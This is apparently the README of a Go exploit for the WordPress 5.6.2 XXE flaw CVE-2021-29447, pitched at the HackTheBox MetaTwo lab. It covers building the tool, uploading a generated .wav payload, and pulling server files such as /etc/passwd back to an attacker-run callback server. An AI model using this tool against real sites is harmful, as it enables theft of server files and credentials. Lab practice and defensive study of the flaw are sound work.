# exploit_cve-2021-29447

For educational purposes only.

This exploit is supposed to be really convenient tool to get any file from server running wordpress 5.6.2 and php8. (see

All you need is base wp-admin access and ability to upload a media file.

The exploit will generate a .wav file payload to upload using wp-admin.

Then it uses exploit's back server to give you eager file right on your console.

The perfect usage is HackTheBox's machine - metatwo


## Usage/Examples

$ go build

$ chmod +x exploit_cve-2021-29447

$ ./exploit_cve-2021-29447 --help                                               
Usage of ./exploit_cve-2021-29447:
  -local-server-ip string
        Use local server ip where a local server will be set
  -local-server-port int
        Use local server port to run local server on
  -o string
        Output file to save exploit's result
  -target-path string
        Use target path to point on file you want to get from target server

$ ./exploit_cve-2021-29447 -local-server-ip=<your ip address> -target-path=/etc/passwd